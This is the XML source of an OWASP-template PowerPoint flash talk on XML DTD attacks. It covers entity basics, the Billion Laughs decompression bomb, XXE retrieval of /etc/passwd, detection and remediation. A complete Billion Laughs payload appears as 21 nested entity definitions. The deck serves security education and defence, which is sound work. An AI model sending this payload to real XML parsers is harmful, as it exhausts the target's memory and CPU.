              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65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F4E12B6C-99EF-4354-9DB4-FB44256B1F40}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean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Entity Examples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Internal Entity Example:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US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smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65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6AF56BED-124A-4B4F-ABC5-3269F098592C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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1828800"/>
            <a:ext cx="381000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&lt;?xml version="1.0“ ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&lt;!DOCTYPE foo [</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>&lt;!ENTITY copyrightStatement  “Warning: This program is protected by copyright law"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> ]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&lt;xmlmessage&gt;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&lt;statement&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&amp;copyrightStatement;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&lt;/statement&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&lt;/xmlmessage&gt;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4267200" y="3352800"/>
            <a:ext cx="582613" cy="550863"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50008"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2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endParaRPr lang="en-US" sz="1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2057400"/>
            <a:ext cx="3810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&lt;?xml version="1.0“ ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> &lt;xmlmessage&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;statement&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Warning: This program is protected by copyright law </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;/statement&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;/xmlmessage&gt;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Entity Examples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External Entity Example:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US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smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65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1CF83D57-0F52-425F-AF19-87CC451FA6FD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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1828800"/>
            <a:ext cx="3810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&lt;?xml version="1.0“ ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&lt;!DOCTYPE foo [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>&lt;!ENTITY copyrightStmtFromFile  “c:\copyrightNotice.txt"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>]&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&lt;xmlmessage&gt;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&lt;statement&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&amp;copyrightStmtFromFile;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&lt;/statement&gt;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&lt;/xmlmessage&gt;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4267200" y="3352800"/>
            <a:ext cx="582613" cy="550863"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50008"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2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endParaRPr lang="en-US" sz="1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2057400"/>
            <a:ext cx="3810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&lt;?xml version="1.0“ ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;xmlmessage&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;statement&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Warning: This program is protected by copyright law </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;/statement&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;/xmlmessage&gt;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Decompression Bomb – The Billion Laughs Attack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An attacker can specify entity definitions in terms of another entity:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRP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EB28ACC3-AD6F-48F8-AC2D-FA040A11D991}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D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2438400"/>
            <a:ext cx="38100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&lt;?xml version="1.0“ ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&lt;!DOCTYPE foo [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>&lt;!ENTITY laugh0 "ha"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1"/>
              <a:t>&lt;!ENTITY laugh1 "&amp;laugh0;&amp;laugh0;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>]&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&lt;xmlmessage&gt;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&lt;statement&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&amp;laugh1;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>&lt;/statement&gt;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&lt;/xmlmessage&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Right Arrow 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="3352800"/>
            <a:ext cx="582613" cy="550863"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50008"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2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endParaRPr lang="en-US" sz="1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0" y="2743200"/>
            <a:ext cx="3810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&lt;?xml version="1.0“ ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> &lt;xmlmessage&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;statement&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>haha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;/statement&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>&lt;/xmlmessage&gt;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65" charset="-128"/>
              </a:rPr>
              <a:t>Decompression Bomb – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>The Billion Laughs Attack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36688"/>
            <a:ext cx="3944938" cy="4729162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>An attacker can cause the parser to use up lots of memory (Gigabytes) and CPU (90%+ utilization) in a very short period of time – known as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Billion Laughs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128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FD2F5706-C90C-4239-AE86-FF9EFAFF6193}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11269" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1524000"/>
            <a:ext cx="2979738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200"/>
              <a:t>&lt;!DOCTYPE billion [</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ELEMENT billion (#PCDATA)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh0 "ha"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh1 "&amp;laugh0;&amp;laugh0;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh2 "&amp;laugh1;&amp;laugh1;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh2 "&amp;laugh1;&amp;laugh1;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh3 "&amp;laugh2;&amp;laugh2;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh4 "&amp;laugh3;&amp;laugh3;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh5 "&amp;laugh4;&amp;laugh4;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh6 "&amp;laugh5;&amp;laugh5;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh7 "&amp;laugh6;&amp;laugh6;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh8 "&amp;laugh7;&amp;laugh7;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh9 "&amp;laugh8;&amp;laugh8;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh10 "&amp;laugh9;&amp;laugh9;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh11 "&amp;laugh10;&amp;laugh10;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh12 "&amp;laugh11;&amp;laugh11;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh13 "&amp;laugh12;&amp;laugh12;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh14 "&amp;laugh13;&amp;laugh13;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh15 "&amp;laugh14;&amp;laugh14;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh16 "&amp;laugh15;&amp;laugh15;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh17 "&amp;laugh16;&amp;laugh16;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh18 "&amp;laugh17;&amp;laugh17;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh19 "&amp;laugh18;&amp;laugh18;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh20 "&amp;laugh19;&amp;laugh19;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;!ENTITY laugh21 "&amp;laugh20;&amp;laugh20;"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>&lt;billion&gt;&amp;laugh21;&lt;/billion&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11270" name="Picture 10" descr="laughing_clow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657600"/>
            <a:ext cx="221773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Successful XXE Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Tex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3250" cy="4729163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>In this example, the /etc/passwd file on the server is retrieved by the attacker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943600" y="6629400"/>
            <a:ext cx="2209800" cy="228600"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{10A56A91-C885-49DF-9925-56847C544AE4}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr algn="l"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
            </a:endParaRPr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209800"/>
            <a:ext cx="4965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WASP Presentation Template">
  <a:themeElements>
    <a:clrScheme name="OWASP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WASP Presentati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WASP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OWASP Presentation Template</Template>
  <TotalTime>131</TotalTime>
  <Words>849</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>179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OWASP Presentation Template</vt:lpstr>
      <vt:lpstr>Flash Talk – XML DTD Attacks</vt:lpstr>
      <vt:lpstr>XML DTD Attacks - Overview</vt:lpstr>
      <vt:lpstr>XML DTD Attacks - Overview</vt:lpstr>
      <vt:lpstr>XML Entities</vt:lpstr>
      <vt:lpstr>Entity Examples</vt:lpstr>
      <vt:lpstr>Entity Examples</vt:lpstr>
      <vt:lpstr>Decompression Bomb – The Billion Laughs Attack</vt:lpstr>
      <vt:lpstr>Decompression Bomb – The Billion Laughs Attack</vt:lpstr>
      <vt:lpstr>Successful XXE Exploitation</vt:lpstr>
      <vt:lpstr>Successful Billion Laughs Exploitation</vt:lpstr>
      <vt:lpstr>Detection in Code</vt:lpstr>
      <vt:lpstr>Remediation</vt:lpstr>
      <vt:lpstr>References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Poland 2010-01</dc:title>
  <dc:subject>Application Security Lifecycle</dc:subject>
  <dc:creator>Wojciech Dworakowski</dc:creator>
  <cp:keywords>Application Security</cp:keywords>
  <cp:lastModifiedBy>Jesse Ou</cp:lastModifiedBy>
  <cp:revision>33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2005-03-04T17:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-02-11T22:25:43Z</dcterms:modified>
  <cp:category>Application Security</cp:category>
</cp:coreProperties>
</file>